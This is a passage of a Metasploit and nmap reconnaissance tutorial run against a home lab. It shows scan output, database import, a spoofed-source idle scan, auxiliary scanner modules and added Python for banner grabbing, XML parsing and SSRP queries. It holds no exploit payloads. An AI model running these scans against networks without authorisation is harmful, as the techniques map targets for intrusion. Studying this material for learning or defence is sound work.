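    ("http", re.compile(rb"^HTTP/1\.[01] \d{3} .*?\r\nServer: Apache/([\d.]+)", re.S),
     "Apache httpd", "$1"),
    ("http", re.compile(rb"^HTTP/1\.[01] \d{3} .*?\r\nServer: Microsoft-HTTPAPI/([\d.]+)", re.S),
     "Microsoft HTTPAPI httpd", "$1"),
]

# Probe to send when the service does not speak first (FTP/SSH/SMTP greet on connect,
# HTTP waits for a request). Assumed mapping for this example.
PROBES = {80: b"GET / HTTP/1.0\r\n\r\n", 8080: b"GET / HTTP/1.0\r\n\r\n", 8100: b"GET / HTTP/1.0\r\n\r\n"}


def match_banner(banner: bytes) -> Optional[dict]:
    """Return {'service','product','version'} for the first matching signature, else None."""
    for service, pattern, product, version_tpl in SIGNATURES:
        m = pattern.search(banner)
        if m:
            version = version_tpl
            for i, grp in enumerate(m.groups(), start=1):
                version = version.replace(f"${i}", (grp or b"").decode(errors="replace"))
            return {"service": service, "product": product, "version": version.strip()}
    return None


def grab_banner(host: str, port: int, timeout: float = 2.0) -> bytes:
    """NULL probe first (just read); if the server stays silent, send a protocol probe."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            data = s.recv(4096)
        except socket.timeout:
            data = b""
        if not data and port in PROBES:
            s.sendall(PROBES[port])
            try:
                data = s.recv(4096)
            except socket.timeout:
                data = b""
        return data


def identify(host: str, port: int) -> Optional[dict]:
    """Grab and match; None is what nmap reports as 'service?' (unrecognized)."""
    banner = grab_banner(host, port)
    return match_banner(banner) if banner else None


def start_greeting_service(greeting: bytes) -> int:
    """Constructed fixture: a loopback TCP service that sends `greeting` on connect."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                conn.sendall(greeting)
                conn.close()
            except OSError:
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_greeting_service(b"220 (vsFTPd 2.3.4)\r\n")   # constructed target
    print(identify("127.0.0.1", port))
```

Signature order matters: the first pattern that matches wins, so specific product patterns go before generic ones. A banner that matches nothing is still worth keeping; that is the raw fingerprint nmap prints in its SF blocks above.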
Nmap combined scans

-Pn skips host discovery and treats the target as up, -sS is the SYN scan, and -A bundles OS detection, version detection, the default NSE script set and traceroute into one run. The second scan below shows why -A is worth its noise: the ms-sql-ntlm-info script leaks the machine name and the OS build 10.0.17763, and the XAMPP certificate on 443 expired in 2019.
# nmap -Pn -sS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:35 CST
Nmap scan report for 192.168.0.106
Host is up (0.00014s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
3000/tcp open  ppp
3306/tcp open  mysql
5555/tcp open  freeciv
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds
# nmap -Pn -sS -A 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:40 CST
Nmap scan report for 192.168.0.106
Host is up (0.00029s latency).
Not shown: 985 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
80/tcp   open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
135/tcp  open  msrpc   Microsoft Windows RPC
139/tcp  open  netbios-ssn Microsoft Windows netbios-ssn
443/tcp  open  ssl/http        Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.0.106/dashboard/
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open  vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1433/tcp open  ms-sql-s        Microsoft SQL Server 2014 12.00.2269.00; RTM+
| ms-sql-ntlm-info: 
|   Target_Name: DESKTOP-9A8VFKB
|   NetBIOS_Domain_Name: DESKTOP-9A8VFKB
|   NetBIOS_Computer_Name: DESKTOP-9A8VFKB
|   DNS_Domain_Name: DESKTOP-9A8VFKB
|   DNS_Computer_Name: DESKTOP-9A8VFKB
|_  Product_Version: 10.0.17763
|_ssl-date: 2022-06-20T04:43:40+00:00; +10s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-20T02:24:59
|_Not valid after:  2052-06-20T02:24:59
2383/tcp open  ms-olap4?
3000/tcp open  ppp?
…
Saving scan results to an XML file and to the database
Saving scan results to an XML file
#nmap -oX nmap.xml 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:25 CST
Nmap scan report for 192.168.0.106
Host is up (0.00023s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
3000/tcp open  ppp
3306/tcp open  mysql
5555/tcp open  freeciv
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)


Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
#cat nmap.xml
…
Saving scan results into the Metasploit database

1) Write the scan to an XML file first

#nmap -Pn -sS -A -oX nmap.xml 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 13:30 CST
Nmap scan report for 192.168.0.106
Host is up (0.00071s latency).
All 1000 scanned ports on 192.168.0.106 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1   0.71 ms 192.168.0.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.18 seconds

2) Then import the file into the database. Note that this particular run saw all 1000 ports as filtered (no-response): the target's firewall state differed from the earlier scans, so only the host record, not its services, reaches the database.

msf6 > db_import /home/jerry/nmap.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.13.1'
[*] Importing host 192.168.0.106
[*] Successfully imported /home/jerry/nmap.xml
msf6 > hosts -c address
Hosts
=====
address
-------
192.168.0.106
192.168.0.155
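What db_import extracts from that XML, as an added example that is not the article's or Metasploit's code: a parser for nmap -oX output producing the same host/port/service rows that `services -u` and `hosts -c address` display. The embedded XML is a constructed, abbreviated sample in the real nmaprun layout, not a capture from this lab.

```python
"""Parse Nmap -oX output into the host/service rows that Metasploit's db_import
stores. Added example, not the article's or Metasploit's code. The XML below is
a constructed, abbreviated sample in the nmaprun layout, not a real capture."""
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX nmap.xml 192.168.0.106" version="7.92">
  <host>
    <status state="up"/>
    <address addr="192.168.0.106" addrtype="ipv4"/>
    <address addr="C8:FF:28:E8:B8:AD" addrtype="mac" vendor="Liteon Technology"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/>
        <service name="ftp" product="FileZilla ftpd" version="0.9.41 beta"/></port>
      <port protocol="tcp" portid="1433"><state state="open" reason="syn-ack"/>
        <service name="ms-sql-s" product="Microsoft SQL Server" version="2014 12.00.2269"/></port>
      <port protocol="tcp" portid="22"><state state="closed" reason="reset"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.0.107" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str, open_only: bool = True) -> List[Dict]:
    """Return one row per port: host, mac, port, proto, name, state, info.
    open_only mirrors `services -u`, which hides everything but open ports."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts that were down carry no ports and are not worth a record
        addrs = {a.get("addrtype"): a.get("addr") for a in host.findall("address")}
        ip = addrs.get("ipv4") or addrs.get("ipv6")
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            if open_only and state != "open":
                continue
            svc = port.find("service")
            info = " ".join(filter(None, [svc.get("product"), svc.get("version")])) if svc is not None else ""
            rows.append({
                "host": ip, "mac": addrs.get("mac"),
                "port": int(port.get("portid")), "proto": port.get("protocol"),
                "name": svc.get("name") if svc is not None else None,
                "state": state, "info": info,
            })
    return rows


def hosts(rows: List[Dict]) -> List[str]:
    """Distinct addresses, like `hosts -c address`."""
    return sorted({r["host"] for r in rows})


def format_services(rows: List[Dict]) -> str:
    """Render rows in the column layout of msfconsole's `services` table."""
    lines = [f"{'host':<15}{'port':<6}{'proto':<7}{'name':<17}{'state':<7}info",
             f"{'----':<15}{'----':<6}{'-----':<7}{'----':<17}{'-----':<7}----"]
    for r in rows:
        lines.append(f"{r['host']:<15}{r['port']:<6}{r['proto']:<7}{(r['name'] or ''):<17}{r['state']:<7}{r['info']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_services(parse_nmap_xml(SAMPLE_NMAP_XML)))
```

Keeping the parser separate from the database is the same split Metasploit makes: the import step only needs the XML, so scans run from another machine or another tool can be merged into one workspace.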

Older releases could also use MySQL; on BackTrack 5 R1 msf shipped with a MySQL driver:

msf> db_driver mysql
msf> db_connect root:123456@127.0.0.1/msf3      # connect to the local MySQL database msf3

There MySQL's root password defaulted to 123456 and db_connect created the msf3 database on first use. Current Metasploit supports PostgreSQL only and the db_driver command no longer exists, so on Kali use msfdb init and the PostgreSQL steps in the next section.

Scanning with the Metasploit database

Setup
#/etc/init.d/postgresql start
Starting postgresql (via systemctl): postgresql.service.
# msfconsole
msf> db_connect postgres:123456@127.0.0.1/msf      (the database user was initialised as postgres:toor; 123456 is the password set on this lab machine)
[*] Connected to Postgres data service: 127.0.0.1/msf
msf> db_status
[*] Connected to msf. Connection type: postgresql.

On a current Kali install msfdb init writes a generated password into /usr/share/metasploit-framework/config/database.yml and msfconsole connects on start-up, so run db_status first and only db_connect by hand if it reports no connection.
TCP idle scan

An idle (zombie) scan bounces the probes off an idle third host, so the target only ever sees packets carrying the zombie's address, never the scanner's.

A usable zombie is a host whose IP ID (the 16-bit identification field of the IP header) goes up by exactly one for every packet it sends. The scanner reads the zombie's IP ID, sends a SYN to the target with the zombie's source address, then reads the IP ID again; an open port makes the target send SYN/ACK to the zombie, which answers with RST and so consumes one extra ID. The ipidseq module finds candidate zombies:

msf6 > use auxiliary/scanner/ip/ipidseq
msf6 auxiliary(scanner/ip/ipidseq) > options
Module options (auxiliary/scanner/ip/ipidseq):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds
msf6 auxiliary(scanner/ip/ipidseq) > set rhost 192.168.0.0/24
rhost => 192.168.0.0/24
RHOSTS accepts a CIDR range, an address range or a file of targets:
set rhost 192.168.0.0/24
set rhost 192.168.0.0-199
set rhost file:/path/xxx.txt
msf6 auxiliary(scanner/ip/ipidseq) > set threads 50
threads => 50
THREADS guideline for the machine running Metasploit: 1-16 on Windows, 1-128 on Unix.
msf6 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.0.1's IPID sequence class: All zeros
[*] Scanned  82 of 256 hosts (32% complete)
[*] Scanned  83 of 256 hosts (32% complete)
[*] Scanned  98 of 256 hosts (38% complete)
[*] 192.168.0.106's IPID sequence class: Incremental!
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.161's IPID sequence class: All zeros
[*] 192.168.0.158's IPID sequence class: Incremental!
[*] 192.168.0.152's IPID sequence class: Randomized
[*] 192.168.0.151's IPID sequence class: Incremental!
[*] 192.168.0.159's IPID sequence class: All zeros
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 169 of 256 hosts (66% complete)
[*] Scanned 183 of 256 hosts (71% complete)
[*] Scanned 212 of 256 hosts (82% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed 
msf6 auxiliary(scanner/ip/ipidseq) >

Hosts reported as Incremental! are candidate zombies.

Attempt to scan 192.168.0.161 through 192.168.0.151:

msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.151 192.168.0.161
[*] exec: nmap -PN -sI 192.168.0.151 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:18 CST
Idle scan using zombie 192.168.0.151 (192.168.0.151:80); Class: Incremental
Even though your Zombie (192.168.0.151; 192.168.0.151) appears to be vulnerable to IP ID sequence prediction (class: Incremental), our attempts have failed.  This generally means that either the Zombie uses a separate IP ID base for each host (like Solaris), or because you cannot spoof IP packets (perhaps your ISP has enabled egress filtering to prevent IP spoofing), or maybe the target network recognizes the packet source as bogus and drops them
QUITTING!

Attempt to scan 192.168.0.161 through 192.168.0.106:

msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.106 192.168.0.161
[*] exec: nmap -PN -sI 192.168.0.106 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:20 CST
Idle scan zombie 192.168.0.106 (192.168.0.106) port 80 cannot be used because it has not returned any of our probes -- perhaps it is down or firewalled.
QUITTING!

Done right, the scanner never sends a packet from its own address to the target and still learns the target's open ports. Neither attempt worked here: 192.168.0.151 has an incremental IP ID but Nmap's test probes through it failed, which usually means the host keeps a separate IP ID counter per destination, the local network drops spoofed source addresses, or the zombie is not actually idle; 192.168.0.106 did not answer the probes on port 80 at all. A zombie must be both incremental and quiet, so a busy Windows desktop running a web server is a poor choice, and -sI still needs root for raw packets.
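The arithmetic behind ipidseq's classes and behind nmap -sI, as an added example (not code from the article, Nmap or Metasploit). The class labels are loosely modelled on what ipidseq prints, the "busy" threshold is an assumption, and the IP ID readings are constructed, not captured.

```python
"""IP ID sequence classification (what ipidseq prints) and the idle-scan
inference nmap -sI draws from a zombie's IP ID. Added example; not code from
the article, Nmap or Metasploit. Sample readings are constructed."""
from typing import Dict, Sequence

MOD = 1 << 16  # the IP identification field is 16 bits wide, so counters wrap


def ipid_class(samples: Sequence[int]) -> str:
    """Classify a run of IP IDs read from successive replies of one host.
    Labels loosely follow ipidseq; only 'Incremental' hosts make usable zombies."""
    if len(samples) < 2:
        return "Unknown"
    if all(s == 0 for s in samples):
        return "All zeros"
    diffs = [(b - a) % MOD for a, b in zip(samples, samples[1:])]
    if all(d == 0 for d in diffs):
        return "Constant"
    if all(d == 1 for d in diffs):
        return "Incremental"
    if all(0 < d <= 5 for d in diffs):  # assumed threshold: incremental but talking to others
        return "Busy incremental"
    # Older Windows wrote the field little-endian, which looks like jumps of 256.
    swapped = [((s & 0xFF) << 8) | (s >> 8) for s in samples]
    if all((b - a) % MOD == 1 for a, b in zip(swapped, swapped[1:])):
        return "Broken little-endian incremental"
    return "Randomized"


def idle_scan_state(ipid_before: int, ipid_after: int) -> str:
    """Interpret the zombie's IP ID jump across one spoofed SYN to the target.
    The scanner's own probe of the zombie costs one ID. An open target port sends
    SYN/ACK to the zombie, which answers RST and burns a second ID. A closed port
    sends RST (the zombie ignores it) and a filtered port sends nothing, so both
    leave only the one ID from the scanner's probe."""
    delta = (ipid_after - ipid_before) % MOD
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return "unknown"  # 0: zombie not answering; >2: zombie not idle, retry or pick another


def idle_scan(zombie_ipids: Sequence[int], ports: Sequence[int]) -> Dict[int, str]:
    """Label each port from a recorded series of zombie IP IDs: one reading before
    the first probe and one after every probe, so len(zombie_ipids) == len(ports) + 1."""
    if len(zombie_ipids) != len(ports) + 1:
        raise ValueError("need one zombie reading around each probed port")
    return {p: idle_scan_state(zombie_ipids[i], zombie_ipids[i + 1]) for i, p in enumerate(ports)}


if __name__ == "__main__":
    # Constructed readings from an idle zombie while ports 21, 22, 23 are probed:
    # 100 -> 102 (port 21 open), 102 -> 103 and 103 -> 104 (22 and 23 closed or filtered).
    print(ipid_class([100, 101, 102, 103]))
    print(ipid_class([65534, 65535, 0, 1]))  # wraps at 16 bits and is still incremental
    print(idle_scan([100, 102, 103, 104], [21, 22, 23]))
```

Real implementations probe each port several times and keep only consistent deltas, because any other traffic the zombie handles during the scan shifts the counter and turns an "open" into an "unknown".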

Running nmap from the MSF console
msf6 > db_connect postgres:123456@127.0.0.1/msf
msf6 > db_nmap -sS -A 192.168.0.106
msf6 > services -u      # -u lists only services in the open state; db_nmap stored the results without an export/import step
Services
========


host           port  proto  name             state  info
----           ----  -----  ----             -----  ----
192.168.0.106  21    tcp    ftp              open   FileZilla ftpd 0.9.41 beta
192.168.0.106  25    tcp    smtp             open   Mercury/32 smtpd Mail server account Maiser
192.168.0.106  79    tcp    finger           open   Mercury/32 fingerd
192.168.0.106  80    tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.0.106  106   tcp    pop3pw           open   Mercury/32 poppass service
192.168.0.106  110   tcp    pop3             open   Mercury/32 pop3d
192.168.0.106  135   tcp    msrpc            open   Microsoft Windows RPC
192.168.0.106  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn
192.168.0.106  143   tcp    imap             open   Mercury/32 imapd 4.62
192.168.0.106  443   tcp    ssl/http         open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
192.168.0.106  445   tcp    microsoft-ds     open
192.168.0.106  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP
192.168.0.106  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP
192.168.0.106  1433  tcp    ms-sql-s         open   Microsoft SQL Server 2014 12.00.2269.00; RTM+
192.168.0.106  2383  tcp    ms-olap4         open
192.168.0.106  2869  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.0.106  3306  tcp    mysql            open   MariaDB unauthorized
192.168.0.106  5555  tcp    freeciv          open
192.168.0.106  8000  tcp    http-alt         open   WSGIServer/0.2 CPython/3.8.0
192.168.0.106  8009  tcp    ajp13            open   Apache Jserv Protocol v1.3
192.168.0.106  8080  tcp    http             open   Apache Tomcat/Coyote JSP engine 1.1
192.168.0.106  8100  tcp    http             open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
192.168.0.151  135   tcp    msrpc            open   Microsoft Windows RPC
192.168.0.151  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn
192.168.0.151  445   tcp    microsoft-ds     open
192.168.0.151  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP
192.168.0.151  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP
192.168.0.151  5357  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
Port scanning with Metasploit

Search for port scanners

msf6 auxiliary(scanner/ip/ipidseq) > search portscan
Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 > use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/portscan/syn) > set threads 100
threads => 100
msf6 auxiliary(scanner/portscan/syn) > run
[+]  TCP OPEN 192.168.0.155:135
[+]  TCP OPEN 192.168.0.155:139
[+]  TCP OPEN 192.168.0.155:445
…

The scanner is slow (it sweeps its PORTS range, default 1-10000, with raw SYNs, so it also needs root) and reports only open ports: 135, 139, 445 and so on. The excerpt shows results for 192.168.0.155 although RHOSTS was set to 192.168.0.106.

Using auxiliary modules

Auxiliary modules
List the module directory
# cd /usr/share/metasploit-framework/modules/auxiliary
# ll
total 108
drwxr-xr-x 47 root root  4096  6月 24 17:25 admin
drwxr-xr-x  2 root root  4096  6月 24 20:36 analyze
drwxr-xr-x  2 root root  4096  6月 24 20:36 bnat
drwxr-xr-x  8 root root  4096  6月 24 17:25 client
drwxr-xr-x  4 root root  4096  6月 24 17:25 cloud
drwxr-xr-x  2 root root  4096  6月 24 20:36 crawler
drwxr-xr-x  2 root root  4096  6月 24 20:36 docx
drwxr-xr-x 27 root root  4096  6月 24 17:25 dos
-rwxr-xr-x  1 root root  1473  6月 16 23:59 example.py
-rw-r--r--  1 root root  1708  6月 16 23:59 example.rb
drwxr-xr-x  2 root root  4096  6月 24 20:36 fileformat
drwxr-xr-x 10 root root  4096  6月 24 17:25 fuzzers
drwxr-xr-x  2 root root 24576  6月 24 20:36 gather
drwxr-xr-x  2 root root  4096  6月 24 20:36 parser
drwxr-xr-x  3 root root  4096  6月 24 17:25 pdf
drwxr-xr-x 87 root root  4096  6月 24 17:25 scanner
drwxr-xr-x  4 root root  4096  6月 24 20:36 server
drwxr-xr-x  2 root root  4096  6月 24 20:36 sniffer
drwxr-xr-x  9 root root  4096  6月 24 17:25 spoof
drwxr-xr-x  5 root root  4096  6月 24 17:25 sqli
drwxr-xr-x  2 root root  4096  6月 24 20:36 voip
drwxr-xr-x  5 root root  4096  6月 24 17:25 vsploit
List the modules
msf6 > show auxiliary
Auxiliary
=========
   #   Name                                                       Disclosure Date  Rank    Check  Description
   -   ----                                                       ---------------  ----    -----  -----------
   0   auxiliary/admin/2wire/xslt_password_reset                  2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability
   1   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal  No     Android Browser RCE Through Google Play Store XFO
   2   auxiliary/admin/appletv/appletv_display_image                               normal  No     Apple TV Image Remote Control
   3   auxiliary/admin/appletv/appletv_display_video                               normal  No     Apple TV Video Remote Control
   4   auxiliary/admin/atg/atg_client                                              normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   5   auxiliary/admin/aws/aws_launch_instances                                    normal  No     Launches Hosts in AWS
   6   auxiliary/admin/backupexec/dump                                             normal  No     Veritas Backup Exec Windows Remote File Access
   7   auxiliary/admin/backupexec/registry                                         normal  No     Veritas Backup Exec Server Registry Access
   8   auxiliary/admin/chromecast/chromecast_reset                                 normal  No     Chromecast Factory Reset DoS
   9   auxiliary/admin/chromecast/chromecast_youtube                               normal  No     Chromecast YouTube Remote Control
   10  auxiliary/admin/db2/db2rcmd                                2004-03-04       normal  No     IBM DB2 db2rcmd.exe Command Execution Vulnerability
   11  auxiliary/admin/dcerpc/cve_2020_1472_zerologon                              normal  Yes    Netlogon Weak Cryptographic Authentication
…
Using an auxiliary module
msf6> use scanner/http/webdav_scanner
Example: finding exposed SQL Server instances
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping
msf6 auxiliary(scanner/mssql/mssql_ping) > options
Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/mssql/mssql_ping) > run
[*] 192.168.0.106:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
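The UDP 1434 exchange that mssql_ping performs, as an added example (not code from the article or from Metasploit). The message layout follows MS-SQLR (the SQL Server Resolution Protocol): the client sends a single CLNT_UCAST_EX byte, the Browser service answers with SVR_RESP, a little-endian length and a ';'-separated key/value string per instance. The instance values in the fixture are constructed to resemble the host seen above; the helper names are this example's own.

```python
"""SQL Server Resolution Protocol (SSRP) client: the UDP 1434 exchange that
Metasploit's mssql_ping performs. Added example, not code from the article or
from Metasploit. Layout per MS-SQLR: request is one byte CLNT_UCAST_EX (0x03);
the reply is SVR_RESP (0x05), a little-endian uint16 length, then ASCII
"key;value;...;;" groups, one group per instance."""
import socket
import struct
from typing import Dict, List

CLNT_UCAST_EX = b"\x03"
SVR_RESP = 0x05
SSRP_PORT = 1434


def parse_ssrp_response(data: bytes) -> List[Dict[str, str]]:
    """Turn a SVR_RESP datagram into one dict per instance; ValueError if malformed."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    (length,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + length].decode("ascii", errors="replace").rstrip("\x00")
    instances = []
    for chunk in body.split(";;"):          # ";;" terminates each instance group
        fields = chunk.split(";")
        if len(fields) < 2:
            continue
        inst = {key: value for key, value in zip(fields[0::2], fields[1::2]) if key}
        if inst:
            instances.append(inst)
    return instances


def ssrp_ping(host: str, timeout: float = 2.0) -> List[Dict[str, str]]:
    """Send CLNT_UCAST_EX to UDP 1434 and parse whatever comes back.
    An empty list means the Browser service did not answer, which is what
    mssql_ping found for 192.168.0.106 even though 1433/tcp was open."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        try:
            data, _ = s.recvfrom(65535)
        except (socket.timeout, ConnectionError):
            return []
    return parse_ssrp_response(data)


def tcp_ports(instances: List[Dict[str, str]]) -> Dict[str, int]:
    """Map InstanceName -> TDS port: the detail you need when the Browser is silent
    and named instances must be reached by port instead of by name."""
    return {i["InstanceName"]: int(i["tcp"]) for i in instances if "tcp" in i and "InstanceName" in i}


def build_ssrp_response(instances: List[Dict[str, str]]) -> bytes:
    """Constructed fixture: encode instances the way a Browser service would."""
    body = "".join(";".join(f"{k};{v}" for k, v in inst.items()) + ";;" for inst in instances)
    raw = body.encode("ascii")
    return bytes([SVR_RESP]) + struct.pack("<H", len(raw)) + raw


if __name__ == "__main__":
    print(ssrp_ping("192.168.0.106", timeout=1.0))   # [] when the Browser service is off
```

A silent Browser service does not mean there is no SQL Server: the default instance listens on 1433 without it, and named instances on dynamic ports can still be found with a TCP scan and a TDS pre-login, which is what nmap's ms-sql-* scripts did above.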
mssql_ping queries the SQL Server Browser service on UDP 1434, not the TDS port itself. No instance was reported here even though nmap saw 1433/tcp open, so the Browser service is stopped or filtered and the instance must be addressed by port directly.

Protocol scans
SSH scan
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ssh/ssh_version) > run
[*] 192.168.0.1/24:22 - Scanned  41 of 256 hosts (16% complete)
[*] 192.168.0.1/24:22 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.1/24:22 - Scanned  82 of 256 hosts (32% complete)
[+] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)
[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)
